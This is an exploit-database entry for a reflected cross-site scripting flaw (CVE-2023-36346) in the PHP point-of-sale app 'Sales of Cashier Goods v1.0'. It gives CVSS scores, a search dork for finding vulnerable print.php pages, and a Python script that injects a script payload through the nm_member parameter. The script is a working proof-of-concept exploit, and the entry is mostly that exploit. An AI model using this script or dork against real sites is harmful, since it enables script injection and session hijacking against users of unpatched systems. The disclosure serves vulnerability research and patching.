Sales of Cashier Goods v1.0 - Cross Site Scripting Exploit

2023-07-0400:00:00

Amirhossein Bahramizadeh

0day.today

cross site scripting

web application

codekop

php

mysql

windows

linux

vulnerability

exploit

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.7%

JSON

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)